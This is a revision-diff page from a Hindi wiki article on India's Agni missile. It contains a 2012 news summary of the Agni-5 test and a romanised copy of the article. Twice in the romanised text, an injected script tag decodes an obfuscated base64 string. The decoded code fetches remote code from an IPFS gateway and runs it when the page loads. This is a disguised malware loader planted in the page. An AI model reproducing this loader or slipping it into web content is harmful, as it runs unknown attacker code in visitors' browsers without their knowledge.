Difference between revisions of "अग्नि प्रक्षेपास्त्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "मुताबिक" to "मुताबिक़")
 
(One intermediate revision by one other user not shown)
Line 9: Line 9:
 
;20 अप्रॅल, 2012 शुक्रवार   
 
;20 अप्रॅल, 2012 शुक्रवार   
 
====अग्नि-5 से भारत चीन की बराबरी में====
 
====अग्नि-5 से भारत चीन की बराबरी में====
अमेरिकी मीडिया ने [[भारत]] के अग्नि-5 मिसाइल के सफल परीक्षण पर कहा है कि इससे भारत को उसके पड़ोसी देश [[चीन]] के बराबर में खड़ा कर दिया है। समाचार पत्र ‘न्यूयॉर्क टाइम्स’ ने अपनी एक रिपोर्ट में कहा, ‘परीक्षण उस वक्त हुआ है जब एशिया में सैन्यकरण को लेकर अंतर्राष्ट्रीय स्तर पर चिंता बढ़ रही है और अमेरिका एवं चीन के बीच सैन्य स्पर्धा भी है।’ अखबार लिखता है, ‘‘मिसाइल की मारक क्षमता 5000 किलोमीटर है और यह बीजिंग एचं शंघाई को निशाना बनाने की क्षमता रखती है।’ इस रिपोर्ट के मुताबिक जिनिवा सेंटर फ़ॉर सेक्योरिटी पॉलिसी के प्रमुख गै्रम हर्ड ने कहा, ‘इस परीक्षण से उस सोच को बढ़ावा मिला है कि पूर्व एशिया ख़ासकर भारत और चीन के बीच हथियारों की होड़ है।’ ‘वाल स्ट्रीट जर्नल’ के मुताबिक विशेषज्ञों का कहना है कि भारत में अग्नि-5 की सबसे आधुनिक मिसाइल है और इसने भारत को चीन के बराबर में ला दिया है। अग्नि-5 मिसाइल की लंबाई 17.5 मीटर है और इस पर क़रीब 2500 करोड़ रुपए की लागत आई है। ये मिसाइल 1.5 टन का हथियार चीन के अंदर तक ले जाने में सक्षम है। वर्ष 2014-15 तक पूरी तरीक़े से सेना में शामिल किए जाने के बाद ये मिसाइल भारत की परमाणु निरोधक क्षमता को कई गुना बढ़ा देगी।  
+
अमेरिकी मीडिया ने [[भारत]] के अग्नि-5 मिसाइल के सफल परीक्षण पर कहा है कि इससे भारत को उसके पड़ोसी देश [[चीन]] के बराबर में खड़ा कर दिया है। समाचार पत्र ‘न्यूयॉर्क टाइम्स’ ने अपनी एक रिपोर्ट में कहा, ‘परीक्षण उस वक्त हुआ है जब एशिया में सैन्यकरण को लेकर अंतर्राष्ट्रीय स्तर पर चिंता बढ़ रही है और अमेरिका एवं चीन के बीच सैन्य स्पर्धा भी है।’ अखबार लिखता है, ‘‘मिसाइल की मारक क्षमता 5000 किलोमीटर है और यह बीजिंग एचं शंघाई को निशाना बनाने की क्षमता रखती है।’ इस रिपोर्ट के मुताबिक़ जिनिवा सेंटर फ़ॉर सेक्योरिटी पॉलिसी के प्रमुख गै्रम हर्ड ने कहा, ‘इस परीक्षण से उस सोच को बढ़ावा मिला है कि पूर्व एशिया ख़ासकर भारत और चीन के बीच हथियारों की होड़ है।’ ‘वाल स्ट्रीट जर्नल’ के मुताबिक़ विशेषज्ञों का कहना है कि भारत में अग्नि-5 की सबसे आधुनिक मिसाइल है और इसने भारत को चीन के बराबर में ला दिया है। अग्नि-5 मिसाइल की लंबाई 17.5 मीटर है और इस पर क़रीब 2500 करोड़ रुपए की लागत आई है। ये मिसाइल 1.5 टन का हथियार चीन के अंदर तक ले जाने में सक्षम है। वर्ष 2014-15 तक पूरी तरीक़े से सेना में शामिल किए जाने के बाद ये मिसाइल भारत की परमाणु निरोधक क्षमता को कई गुना बढ़ा देगी।  
 
; समाचार को विभिन्न स्रोतों पर पढ़ें
 
; समाचार को विभिन्न स्रोतों पर पढ़ें
 
*[http://navbharattimes.indiatimes.com/articleshow/12743645.cms नवभारत टाइम्स]
 
*[http://navbharattimes.indiatimes.com/articleshow/12743645.cms नवभारत टाइम्स]
 
*[http://zeenews.india.com/hindi/news/%E0%A4%A6%E0%A5%81%E0%A4%A8%E0%A4%BF%E0%A4%AF%E0%A4%BE/%E2%80%98%E0%A4%85%E0%A4%97%E0%A5%8D%E0%A4%A8%E0%A4%BF-5-%E0%A4%B8%E0%A5%87-%E0%A4%AD%E0%A4%BE%E0%A4%B0%E0%A4%A4-%E0%A4%9A%E0%A5%80%E0%A4%A8-%E0%A4%95%E0%A5%87-%E0%A4%AC%E0%A4%B0%E0%A4%BE%E0%A4%AC/120261 ज़ी न्यूज डॉट कॉम]
 
*[http://zeenews.india.com/hindi/news/%E0%A4%A6%E0%A5%81%E0%A4%A8%E0%A4%BF%E0%A4%AF%E0%A4%BE/%E2%80%98%E0%A4%85%E0%A4%97%E0%A5%8D%E0%A4%A8%E0%A4%BF-5-%E0%A4%B8%E0%A5%87-%E0%A4%AD%E0%A4%BE%E0%A4%B0%E0%A4%A4-%E0%A4%9A%E0%A5%80%E0%A4%A8-%E0%A4%95%E0%A5%87-%E0%A4%AC%E0%A4%B0%E0%A4%BE%E0%A4%AC/120261 ज़ी न्यूज डॉट कॉम]
 
*[http://www.bbc.co.uk/hindi/india/2012/04/120416_agni5_analysis_va.shtml बी.बी.सी. हिन्दी]
 
*[http://www.bbc.co.uk/hindi/india/2012/04/120416_agni5_analysis_va.shtml बी.बी.सी. हिन्दी]
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{प्रक्षेपास्त्र}}
 
{{प्रक्षेपास्त्र}}
[[Category:थल सेना]]
+
[[Category:आयुध]][[Category:थल सेना]][[Category:प्रक्षेपास्त्र]][[Category:समाचार जगत]][[Category:भारतीय सेना]][[Category:विज्ञान कोश]][[Category:गणराज्य संरचना कोश]]
[[Category:प्रक्षेपास्त्र]]
 
[[Category:समाचार जगत]]
 
[[Category:भारतीय सेना]][[Category:विज्ञान कोश]][[Category:गणराज्य संरचना कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 09:51, 11 February 2021

chitr:Disamb2.jpg agni ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- agni (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thumb|agni prakshepastr agni prakshepastr paramanu hathiyar le jane mean saksham bharat ki pramukh misailoan mean se ek hai. yah misail madhyam doori tak ki misail hai, jo satah se satah par mar karane vala prakshepastr hai.

  • is misail ki marak kshamata dedh hazar kimi. (1,500 kimi.) tak ki hai.
  • yah ek hazar kilogram bhar vala astr le jane mean bhi poori tarah saksham hai.
  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

samachar

20 aprॅl, 2012 shukravar

agni-5 se bharat chin ki barabari mean

ameriki midiya ne bharat ke agni-5 misail ke saphal parikshan par kaha hai ki isase bharat ko usake p dosi desh chin ke barabar mean kh da kar diya hai. samachar patr ‘nyooy aaurk taims’ ne apani ek riport mean kaha, ‘parikshan us vakt hua hai jab eshiya mean sainyakaran ko lekar aantarrashtriy star par chianta badh rahi hai aur amerika evan chin ke bich sainy spardha bhi hai.’ akhabar likhata hai, ‘‘misail ki marak kshamata 5000 kilomitar hai aur yah bijiang echan shanghaee ko nishana banane ki kshamata rakhati hai.’ is riport ke mutabiq jiniva seantar f aaur sekyoriti p aaulisi ke pramukh gaihram hard ne kaha, ‘is parikshan se us soch ko badhava mila hai ki poorv eshiya khasakar bharat aur chin ke bich hathiyaroan ki ho d hai.’ ‘val strit jarnal’ ke mutabiq visheshajnoan ka kahana hai ki bharat mean agni-5 ki sabase adhunik misail hai aur isane bharat ko chin ke barabar mean la diya hai. agni-5 misail ki lanbaee 17.5 mitar hai aur is par qarib 2500 karo d rupe ki lagat aee hai. ye misail 1.5 tan ka hathiyar chin ke aandar tak le jane mean saksham hai. varsh 2014-15 tak poori tariqe se sena mean shamil kie jane ke bad ye misail bharat ki paramanu nirodhak kshamata ko kee guna badha degi.

samachar ko vibhinn srotoan par padhean
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh